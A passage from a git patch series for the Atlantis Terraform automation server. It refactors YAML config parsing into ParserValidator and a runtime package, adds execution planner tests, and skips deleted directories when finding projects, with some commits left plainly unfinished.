@@ -170,8 +170,8 @@ func TestRun_CreatesWorkspace(t *testing.T) {
 			terraform := mocks.NewMockClient()
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := yaml.PlanStep{
-				Meta: yaml.StepMeta{
+			s := runtime.PlanStep{
+				Meta: runtime.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
@@ -212,8 +212,8 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
 	terraform := mocks.NewMockClient()
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := yaml.PlanStep{
-		Meta: yaml.StepMeta{
+	s := runtime.PlanStep{
+		Meta: runtime.StepMeta{
 			Log:                   logger,
 			Workspace:             "workspace",
 			AbsolutePath:          "/path",
@@ -258,8 +258,8 @@ func TestRun_AddsEnvVarFile(t *testing.T) {
 	// Using version >= 0.10 here so we don't expect any env commands.
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := yaml.PlanStep{
-		Meta: yaml.StepMeta{
+	s := runtime.PlanStep{
+		Meta: runtime.StepMeta{
 			Log:                   logger,
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
diff --git a/server/events/yaml/repoconfig.go b/server/events/runtime/repoconfig.go
similarity index 99%
rename from server/events/yaml/repoconfig.go
rename to server/events/runtime/repoconfig.go
index 7af982436b..138f73f0db 100644
--- a/server/events/yaml/repoconfig.go
+++ b/server/events/runtime/repoconfig.go
@@ -1,4 +1,4 @@
-package yaml
+package runtime
 
 import (
 	"github.com/hashicorp/go-version"
diff --git a/server/events/yaml/run_step.go b/server/events/runtime/run_step.go
similarity index 97%
rename from server/events/yaml/run_step.go
rename to server/events/runtime/run_step.go
index e4794a22ce..ba6dbe3859 100644
--- a/server/events/yaml/run_step.go
+++ b/server/events/runtime/run_step.go
@@ -1,4 +1,4 @@
-package yaml
+package runtime
 
 import (
 	"fmt"
diff --git a/server/events/runtime/run_step_test.go b/server/events/runtime/run_step_test.go
new file mode 100644
index 0000000000..899327a695
--- /dev/null
+++ b/server/events/runtime/run_step_test.go
@@ -0,0 +1,3 @@
+package runtime_test
+
+// todo
diff --git a/server/events/runtime/runtime.go b/server/events/runtime/runtime.go
new file mode 100644
index 0000000000..ea70550a68
--- /dev/null
+++ b/server/events/runtime/runtime.go
@@ -0,0 +1,4 @@
+// Package runtime handles constructing an execution graph for each action
+// based on configuration and defaults. The handlers can then execute this
+// graph.
+package runtime
diff --git a/server/events/yaml/reader.go b/server/events/yaml/parser_validator.go
similarity index 59%
rename from server/events/yaml/reader.go
rename to server/events/yaml/parser_validator.go
index eaea835393..8612015043 100644
--- a/server/events/yaml/reader.go
+++ b/server/events/yaml/parser_validator.go
@@ -5,49 +5,46 @@ import (
 	"io/ioutil"
 	"os"
 	"path/filepath"
-	"strings"
 
 	"github.com/pkg/errors"
 	"gopkg.in/yaml.v2"
 )
 
+// AtlantisYAMLFilename is the name of the config file for each repo.
 const AtlantisYAMLFilename = "atlantis.yaml"
-const PlanStageName = "plan"
-const ApplyStageName = "apply"
 
-type Reader struct{}
+type ParserValidator struct{}
 
-// ReadConfig returns the parsed and validated config for repoDir.
-// If there was no config, it returns a nil pointer.
-func (r *Reader) ReadConfig(repoDir string) (*Config, error) {
+// ReadConfig returns the parsed and validated atlantis.yaml config for repoDir.
+// If there was no config file, then this can be detected by checking the type
+// of error: os.IsNotExist(error).
+func (r *ParserValidator) ReadConfig(repoDir string) (Config, error) {
 	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
 	configData, err := ioutil.ReadFile(configFile)
 
-	// If the file doesn't exist return nil.
+	// NOTE: the error we return here must also be os.IsNotExist since that's
+	// what our callers use to detect a missing config file.
 	if err != nil && os.IsNotExist(err) {
-		return nil, nil
+		return Config{}, err
 	}
 
 	// If it exists but we couldn't read it return an error.
 	if err != nil {
-		return nil, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
+		return Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
 	}
 
 	// If the config file exists, parse it.
 	config, err := r.parseAndValidate(configData)
 	if err != nil {
-		return nil, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
+		return Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
 	}
-	return &config, err
+	return config, err
 }
 
-func (r *Reader) parseAndValidate(configData []byte) (Config, error) {
+func (r *ParserValidator) parseAndValidate(configData []byte) (Config, error) {
 	var repoConfig Config
 	if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil {
-		// Unmarshal error messages aren't fit for user output. We need to
-		// massage them.
-		// todo: fix "field autoplan not found in struct yaml.alias" errors
-		return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.Config", "", -1))
+		return repoConfig, err
 	}
 
 	// Validate version.
diff --git a/server/events/yaml/reader_test.go b/server/events/yaml/parser_validator_test.go
similarity index 71%
rename from server/events/yaml/reader_test.go
rename to server/events/yaml/parser_validator_test.go
index 7dc4b25b4c..4adc8ca34d 100644
--- a/server/events/yaml/reader_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -2,6 +2,7 @@ package yaml_test
 
 import (
 	"io/ioutil"
+	"os"
 	"path/filepath"
 	"testing"
 
@@ -10,20 +11,18 @@ import (
 )
 
 func TestReadConfig_DirDoesNotExist(t *testing.T) {
-	r := yaml.Reader{}
-	conf, err := r.ReadConfig("/not/exist")
-	Ok(t, err)
-	Assert(t, conf == nil, "exp nil ptr")
+	r := yaml.ParserValidator{}
+	_, err := r.ReadConfig("/not/exist")
+	Assert(t, os.IsNotExist(err), "exp nil ptr")
 }
 
 func TestReadConfig_FileDoesNotExist(t *testing.T) {
 	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
 
-	r := yaml.Reader{}
-	conf, err := r.ReadConfig(tmpDir)
-	Ok(t, err)
-	Assert(t, conf == nil, "exp nil ptr")
+	r := yaml.ParserValidator{}
+	_, err := r.ReadConfig(tmpDir)
+	Assert(t, os.IsNotExist(err), "exp nil ptr")
 }
 
 func TestReadConfig_BadPermissions(t *testing.T) {
@@ -32,7 +31,7 @@ func TestReadConfig_BadPermissions(t *testing.T) {
 	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
 	Ok(t, err)
 
-	r := yaml.Reader{}
+	r := yaml.ParserValidator{}
 	_, err = r.ReadConfig(tmpDir)
 	ErrContains(t, "unable to read atlantis.yaml file: ", err)
 }
@@ -48,7 +47,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) {
 		{
 			"random characters",
 			"slkjds",
-			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds`",
+			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds` into yaml.Config",
 		},
 		{
 			"just a colon",
@@ -64,7 +63,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) {
 		t.Run(c.description, func(t *testing.T) {
 			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
 			Ok(t, err)
-			r := yaml.Reader{}
+			r := yaml.ParserValidator{}
 			_, err = r.ReadConfig(tmpDir)
 			ErrEquals(t, c.expErr, err)
 		})
@@ -161,175 +160,6 @@ projects:
 - unknown: value`,
 			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct yaml.alias",
 		},
-
-		// project workflow doesn't exist
-		// workflow has plan and apply keys (otherwise no point specifying it)
-		// plan/apply stages must have non-empty steps key
-
-		// Test the steps key.
-		{
-			description: "unsupported step type",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - unsupported`,
-			expErr: "unsupported step type: \"unsupported\"",
-		},
-
-		// Init step.
-		{
-			description: "unsupported arg to init step",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - init:
-          extra_args: ["hi"]
-          hi: bye
-`,
-			expErr: "unsupported key \"hi\" for step init – the only supported key is extra_args",
-		},
-		{
-			description: "invalid value type to init step's extra_args",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - init:
-          extra_args: arg
-`,
-			expErr: "expected array of strings as value of extra_args, not \"arg\"",
-		},
-
-		// Plan step.
-		{
-			description: "unsupported arg to plan step",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - plan:
-          extra_args: ["hi"]
-          hi: bye
-`,
-			expErr: "unsupported key \"hi\" for step plan – the only supported key is extra_args",
-		},
-		{
-			description: "invalid value type to plan step's extra_args",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - plan:
-          extra_args: arg
-`,
-			expErr: "expected array of strings as value of extra_args, not \"arg\"",
-		},
-
-		// Apply step.
-		{
-			description: "unsupported arg to apply step",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - apply:
-          extra_args: ["hi"]
-          hi: bye
-`,
-			expErr: "unsupported key \"hi\" for step apply – the only supported key is extra_args",
-		},
-		{
-			description: "invalid value type to apply step's extra_args",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - apply:
-          extra_args: arg
-`,
-			expErr: "expected array of strings as value of extra_args, not \"arg\"",
-		},
-		{
-			description: "invalid step type",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - rn: echo should fail
-`,
-			expErr: "yaml: unmarshal errors:\n  line 9: field rn not found in struct struct { Run string \"yaml:\\\"run\\\"\" }",
-		},
-		{
-			description: "missed the steps key and just set an array directly",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      - init
-`,
-			expErr: "missing \"steps\" key",
-		},
-		{
-			description: "no value after plan:",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-`,
-			expErr: "missing \"steps\" key",
-		},
-		{
-			description: "no value after apply:",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-`,
-			expErr: "missing \"steps\" key",
-		},
 	}
 
 	tmpDir, cleanup := TempDir(t)
@@ -340,7 +170,7 @@ workflows:
 			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
 			Ok(t, err)
 
-			r := yaml.Reader{}
+			r := yaml.ParserValidator{}
 			_, err = r.ReadConfig(tmpDir)
 			ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
 		})
@@ -595,7 +425,7 @@ workflows:
 							Steps: []yaml.StepConfig{
 								{
 									StepType:  "init",
-									ExtraArgs: nil,
+									ExtraArgs: []string{},
 								},
 								{
 									StepType:  "plan",
@@ -642,18 +472,16 @@ workflows:
 						Plan: &yaml.Stage{
 							Steps: []yaml.StepConfig{
 								{
-									StepType:  "run",
-									ExtraArgs: nil,
-									Run:       []string{"echo", "plan hi"},
+									StepType: "run",
+									Run:      []string{"echo", "plan hi"},
 								},
 							},
 						},
 						Apply: &yaml.Stage{
 							Steps: []yaml.StepConfig{
 								{
-									StepType:  "run",
-									ExtraArgs: nil,
-									Run:       []string{"echo", "apply", "arg 2"},
+									StepType: "run",
+									Run:      []string{"echo", "apply", "arg 2"},
 								},
 							},
 						},
@@ -671,10 +499,10 @@ workflows:
 			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
 			Ok(t, err)
 
-			r := yaml.Reader{}
+			r := yaml.ParserValidator{}
 			act, err := r.ReadConfig(tmpDir)
 			Ok(t, err)
-			Equals(t, &c.expOutput, act)
+			Equals(t, c.expOutput, act)
 		})
 	}
 }
diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go
index b2c136e59d..dade99baef 100644
--- a/server/events/yaml/project.go
+++ b/server/events/yaml/project.go
@@ -9,12 +9,14 @@ type Project struct {
 	ApplyRequirements []string  `yaml:"apply_requirements"`
 }
 
+const DefaultWorkspace = "default"
+
 func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error {
 	// Use a type alias so unmarshal doesn't get into an infinite loop.
 	type alias Project
 	// Set up defaults.
 	defaults := alias{
-		Workspace: defaultWorkspace,
+		Workspace: DefaultWorkspace,
 		AutoPlan: &AutoPlan{
 			Enabled:      true,
 			WhenModified: []string{"**/*.tf"},
diff --git a/server/events/yaml/run_step_test.go b/server/events/yaml/run_step_test.go
deleted file mode 100644
index d00e3ec788..0000000000
--- a/server/events/yaml/run_step_test.go
+++ /dev/null
@@ -1,3 +0,0 @@
-package yaml
-
-// todo
diff --git a/server/events/yaml/yaml.go b/server/events/yaml/yaml.go
new file mode 100644
index 0000000000..08b884cae0
--- /dev/null
+++ b/server/events/yaml/yaml.go
@@ -0,0 +1,4 @@
+// Package yaml contains the golang representations of the YAML elements
+// supported in atlantis.yaml. Many of the elements implement UnmarshalYAML
+// in order to set defaults.
+package yaml
diff --git a/server/server.go b/server/server.go
index 9381d74690..8ae0e5b6eb 100644
--- a/server/server.go
+++ b/server/server.go
@@ -37,6 +37,7 @@ import (
 	"github.com/runatlantis/atlantis/server/events/locking/boltdb"
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/run"
+	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
@@ -200,8 +201,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		ConfigReader: configReader,
 		Terraform:    terraformClient,
 	}
-	executionPlanner := &yaml.ExecutionPlanner{
-		ConfigReader:      &yaml.Reader{},
+	executionPlanner := &runtime.ExecutionPlanner{
+		ParserValidator:   &yaml.ParserValidator{},
 		DefaultTFVersion:  terraformClient.Version(),
 		TerraformExecutor: terraformClient,
 	}

From 437b62591a467e54b7e5ff42295dd626a9167daf Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 8 Jun 2018 20:58:29 +0100
Subject: [PATCH 16/69] Test execution_planner

---
 server/events/runtime/execution_planner.go    |  22 +-
 .../events/runtime/execution_planner_test.go  | 198 ++++++++++++++++++
 testing/temp_files.go                         |   4 +-
 3 files changed, 212 insertions(+), 12 deletions(-)
 create mode 100644 server/events/runtime/execution_planner_test.go

diff --git a/server/events/runtime/execution_planner.go b/server/events/runtime/execution_planner.go
index 012d6b008d..401efa7c4e 100644
--- a/server/events/runtime/execution_planner.go
+++ b/server/events/runtime/execution_planner.go
@@ -35,6 +35,17 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str
 	}, nil
 }
 
+func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) {
+	defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+	steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
+	if err != nil {
+		return nil, err
+	}
+	return &ApplyStage{
+		Steps: steps,
+	}, nil
+}
+
 func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) {
 	config, err := s.ParserValidator.ReadConfig(repoDir)
 
@@ -108,17 +119,6 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 	return defaults, nil
 }
 
-func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) {
-	defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-	steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
-	if err != nil {
-		return nil, err
-	}
-	return &ApplyStage{
-		Steps: steps,
-	}, nil
-}
-
 func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) StepMeta {
 	return StepMeta{
 		Log:                   log,
diff --git a/server/events/runtime/execution_planner_test.go b/server/events/runtime/execution_planner_test.go
new file mode 100644
index 0000000000..9c3fd5ac4d
--- /dev/null
+++ b/server/events/runtime/execution_planner_test.go
@@ -0,0 +1,198 @@
+package runtime_test
+
+import (
+	"io/ioutil"
+	"path/filepath"
+	"testing"
+
+	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/events/runtime"
+	"github.com/runatlantis/atlantis/server/logging"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+// When there is no config file, should use the defaults.
+func TestBuildStage_NoConfigFile(t *testing.T) {
+	var defaultTFVersion *version.Version
+	var terraformExecutor runtime.TerraformExec
+	e := runtime.ExecutionPlanner{
+		DefaultTFVersion:  defaultTFVersion,
+		TerraformExecutor: terraformExecutor,
+	}
+
+	log := logging.NewNoopLogger()
+	repoDir := "/willnotexist"
+	workspace := "myworkspace"
+	relProjectPath := "mydir"
+	var extraCommentArgs []string
+	username := "myuser"
+	meta := runtime.StepMeta{
+		Log:                   log,
+		Workspace:             workspace,
+		AbsolutePath:          filepath.Join(repoDir, relProjectPath),
+		DirRelativeToRepoRoot: relProjectPath,
+		TerraformVersion:      defaultTFVersion,
+		TerraformExecutor:     terraformExecutor,
+		ExtraCommentArgs:      extraCommentArgs,
+		Username:              username,
+	}
+
+	// Test the plan stage first.
+	t.Run("plan stage", func(t *testing.T) {
+		planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+		Ok(t, err)
+		Equals(t, runtime.PlanStage{
+			Steps: []runtime.Step{
+				&runtime.InitStep{
+					Meta: meta,
+				},
+				&runtime.PlanStep{
+					Meta: meta,
+				},
+			},
+		}, *planStage)
+	})
+
+	// Then the apply stage.
+	t.Run("apply stage", func(t *testing.T) {
+		applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+		Ok(t, err)
+		Equals(t, runtime.ApplyStage{
+			Steps: []runtime.Step{
+				&runtime.ApplyStep{
+					Meta: meta,
+				},
+			},
+		}, *applyStage)
+	})
+}
+
+func TestBuildStage(t *testing.T) {
+	var defaultTFVersion *version.Version
+	var terraformExecutor runtime.TerraformExec
+	e := runtime.ExecutionPlanner{
+		DefaultTFVersion:  defaultTFVersion,
+		TerraformExecutor: terraformExecutor,
+	}
+
+	// Write atlantis.yaml config.
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(`
+version: 2
+projects:
+- dir: "."
+  workflow: custom
+workflows:
+  custom:
+    plan:
+      steps:
+      - init:
+          extra_args: [arg1, arg2]
+      - plan
+      - run: echo hi
+    apply:
+      steps:
+      - run: prerun
+      - apply:
+          extra_args: [arg3, arg4]
+      - run: postrun
+`), 0644)
+	Ok(t, err)
+
+	repoDir := tmpDir
+	log := logging.NewNoopLogger()
+	workspace := "myworkspace"
+	// Our config is for '.' so there will be no config for this project.
+	relProjectPath := "mydir"
+	var extraCommentArgs []string
+	username := "myuser"
+	meta := runtime.StepMeta{
+		Log:                   log,
+		Workspace:             workspace,
+		AbsolutePath:          filepath.Join(repoDir, relProjectPath),
+		DirRelativeToRepoRoot: relProjectPath,
+		TerraformVersion:      defaultTFVersion,
+		TerraformExecutor:     terraformExecutor,
+		ExtraCommentArgs:      extraCommentArgs,
+		Username:              username,
+	}
+
+	t.Run("plan stage for project without config", func(t *testing.T) {
+		// This project isn't listed so it should get the defaults.
+		planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+		Ok(t, err)
+		Equals(t, runtime.PlanStage{
+			Steps: []runtime.Step{
+				&runtime.InitStep{
+					Meta: meta,
+				},
+				&runtime.PlanStep{
+					Meta: meta,
+				},
+			},
+		}, *planStage)
+	})
+
+	t.Run("apply stage for project without config", func(t *testing.T) {
+		// This project isn't listed so it should get the defaults.
+		applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+		Ok(t, err)
+		Equals(t, runtime.ApplyStage{
+			Steps: []runtime.Step{
+				&runtime.ApplyStep{
+					Meta: meta,
+				},
+			},
+		}, *applyStage)
+	})
+
+	// Create the meta for the custom project.
+	customMeta := meta
+	customMeta.Workspace = "default"
+	customMeta.DirRelativeToRepoRoot = "."
+	customMeta.AbsolutePath = tmpDir
+
+	t.Run("plan stage for custom config", func(t *testing.T) {
+		planStage, err := e.BuildPlanStage(log, repoDir, "default", ".", extraCommentArgs, username)
+		Ok(t, err)
+
+		Equals(t, runtime.PlanStage{
+			Steps: []runtime.Step{
+				&runtime.InitStep{
+					Meta:      customMeta,
+					ExtraArgs: []string{"arg1", "arg2"},
+				},
+				&runtime.PlanStep{
+					Meta: customMeta,
+				},
+				&runtime.RunStep{
+					Meta:     customMeta,
+					Commands: []string{"echo", "hi"},
+				},
+			},
+		}, *planStage)
+	})
+
+	t.Run("apply stage for custom config", func(t *testing.T) {
+		planStage, err := e.BuildApplyStage(log, repoDir, "default", ".", extraCommentArgs, username)
+		Ok(t, err)
+
+		Equals(t, runtime.ApplyStage{
+			Steps: []runtime.Step{
+				&runtime.RunStep{
+					Meta:     customMeta,
+					Commands: []string{"prerun"},
+				},
+				&runtime.ApplyStep{
+					Meta:      customMeta,
+					ExtraArgs: []string{"arg3", "arg4"},
+				},
+				&runtime.RunStep{
+					Meta:     customMeta,
+					Commands: []string{"postrun"},
+				},
+			},
+		}, *planStage)
+	})
+}
diff --git a/testing/temp_files.go b/testing/temp_files.go
index f91074967a..85dd68c5b1 100644
--- a/testing/temp_files.go
+++ b/testing/temp_files.go
@@ -7,7 +7,9 @@ import (
 )
 
 // TempDir creates a temporary directory and returns its path along
-// with a cleanup function to be called via defer.
+// with a cleanup function to be called via defer, ex:
+//   dir, cleanup := TempDir()
+//   defer cleanup()
 func TempDir(t *testing.T) (string, func()) {
 	tmpDir, err := ioutil.TempDir("", "")
 	Ok(t, err)

From 9839e0dac1f31583be4c68c38cbeb25408aa4074 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 11 Jun 2018 18:00:57 +0100
Subject: [PATCH 17/69] Move execution planner. Don't plan in deleted dirs

---
 .../events/{runtime => }/execution_planner.go |  53 +++++++-
 .../{runtime => }/execution_planner_test.go   |   0
 server/events/project_finder.go               |  42 +++++--
 server/events/project_finder_test.go          | 116 +++++++++++-------
 4 files changed, 154 insertions(+), 57 deletions(-)
 rename server/events/{runtime => }/execution_planner.go (74%)
 rename server/events/{runtime => }/execution_planner_test.go (100%)

diff --git a/server/events/runtime/execution_planner.go b/server/events/execution_planner.go
similarity index 74%
rename from server/events/runtime/execution_planner.go
rename to server/events/execution_planner.go
index 401efa7c4e..eee10f5890 100644
--- a/server/events/runtime/execution_planner.go
+++ b/server/events/execution_planner.go
@@ -6,6 +6,7 @@ import (
 	"path/filepath"
 
 	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/events"
 	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/logging"
 )
@@ -18,13 +19,14 @@ type ExecutionPlanner struct {
 	TerraformExecutor TerraformExec
 	DefaultTFVersion  *version.Version
 	ParserValidator   *yaml.ParserValidator
+	ProjectFinder     events.ProjectFinder
 }
 
 type TerraformExec interface {
 	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
 }
 
-func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*PlanStage, error) {
+func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (PlanStage, error) {
 	defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
 	steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
 	if err != nil {
@@ -35,6 +37,55 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str
 	}, nil
 }
 
+func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]PlanStage, error) {
+	// If there is an atlantis.yaml
+	// -> Get modified files from pull request.
+	// -> For each project, if autoplan == true && files match
+	// ->->  Build plan stage for that project.
+	// Else
+	// -> Get modified files
+	// -> For each modified project use default plan stage.
+	config, err := s.ParserValidator.ReadConfig(repoDir)
+	if err != nil && !os.IsNotExist(err) {
+		return nil, err
+	}
+
+	// If there is no config file, then we try to plan for each project that
+	// was modified in the pull request.
+	if os.IsNotExist(err) {
+		projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir)
+		var stages []PlanStage
+		for _, p := range projects {
+			// NOTE: we use the default workspace because we don't know about
+			// other workspaces. If users want to plan for other workspaces they
+			// need to use a config file.
+			steps := s.defaultPlanSteps(log, repoDir, defaultWorkspace, p.Path, nil, username)
+			stages = append(stages, PlanStage{
+				Steps: steps,
+			})
+		}
+		return stages, nil
+	}
+
+	// Else we run plan according to the config file.
+	var stages []PlanStage
+	for _, p := range config.Projects {
+		if s.shouldAutoplan(p.AutoPlan, modifiedFiles) {
+			// todo
+			stages = append(stages)
+		}
+	}
+	return stages, nil
+}
+
+func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool {
+
+}
+
+func (s *ExecutionPlanner) getSteps() {
+
+}
+
 func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) {
 	defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
 	steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
diff --git a/server/events/runtime/execution_planner_test.go b/server/events/execution_planner_test.go
similarity index 100%
rename from server/events/runtime/execution_planner_test.go
rename to server/events/execution_planner_test.go
diff --git a/server/events/project_finder.go b/server/events/project_finder.go
index e14c3b7e72..315f480bd5 100644
--- a/server/events/project_finder.go
+++ b/server/events/project_finder.go
@@ -49,19 +49,26 @@ func (p *DefaultProjectFinder) DetermineProjects(log *logging.SimpleLogger, modi
 	log.Info("filtered modified files to %d .tf files: %v",
 		len(modifiedTerraformFiles), modifiedTerraformFiles)
 
-	var paths []string
+	var dirs []string
 	for _, modifiedFile := range modifiedTerraformFiles {
-		projectPath := p.getProjectPath(modifiedFile, repoDir)
-		if projectPath != "" {
-			paths = append(paths, projectPath)
+		projectDir := p.getProjectDir(modifiedFile, repoDir)
+		if projectDir != "" {
+			dirs = append(dirs, projectDir)
 		}
 	}
-	uniquePaths := p.unique(paths)
-	for _, uniquePath := range uniquePaths {
-		projects = append(projects, models.NewProject(repoFullName, uniquePath))
+	uniqueDirs := p.unique(dirs)
+
+	// The list of modified files will include files that were deleted. We still
+	// want to run plan if a file was deleted since that often results in a
+	// change however we want to remove directories that have been completely
+	// deleted.
+	exists := p.filterToDirExists(uniqueDirs, repoDir)
+
+	for _, p := range exists {
+		projects = append(projects, models.NewProject(repoFullName, p))
 	}
 	log.Info("there are %d modified project(s) at path(s): %v",
-		len(projects), strings.Join(uniquePaths, ", "))
+		len(projects), strings.Join(exists, ", "))
 	return projects
 }
 
@@ -84,12 +91,12 @@ func (p *DefaultProjectFinder) isInExcludeList(fileName string) bool {
 	return false
 }
 
-// getProjectPath attempts to determine based on the location of a modified
+// getProjectDir attempts to determine based on the location of a modified
 // file, where the root of the Terraform project is. It also attempts to verify
 // if the root is valid by looking for a main.tf file. It returns a relative
-// path. If the project is at the root returns ".". If modified file doesn't
-// lead to a valid project path, returns an empty string.
-func (p *DefaultProjectFinder) getProjectPath(modifiedFilePath string, repoDir string) string {
+// path to the repo. If the project is at the root returns ".". If modified file
+// doesn't lead to a valid project path, returns an empty string.
+func (p *DefaultProjectFinder) getProjectDir(modifiedFilePath string, repoDir string) string {
 	dir := path.Dir(modifiedFilePath)
 	if path.Base(dir) == "env" {
 		// If the modified file was inside an env/ directory, we treat this
@@ -159,3 +166,14 @@ func (p *DefaultProjectFinder) unique(strs []string) []string {
 	}
 	return unique
 }
+
+func (p *DefaultProjectFinder) filterToDirExists(relativePaths []string, repoDir string) []string {
+	var filtered []string
+	for _, pth := range relativePaths {
+		absPath := filepath.Join(repoDir, pth)
+		if _, err := os.Stat(absPath); !os.IsNotExist(err) {
+			filtered = append(filtered, pth)
+		}
+	}
+	return filtered
+}
diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go
index dd9af7792f..8e787a6eec 100644
--- a/server/events/project_finder_test.go
+++ b/server/events/project_finder_test.go
@@ -30,24 +30,37 @@ var m = events.DefaultProjectFinder{}
 var nestedModules1 string
 var nestedModules2 string
 var topLevelModules string
+var envDir string
 
 func setupTmpRepos(t *testing.T) {
 	// Create different repo structures for testing.
 
 	// 1. Nested modules directory inside a project
+	// non-tf
+	// terraform.tfstate
+	// terraform.tfstate.backup
 	// project1/
 	//   main.tf
+	//   terraform.tfstate
+	//   terraform.tfstate.backup
 	//   modules/
 	//     main.tf
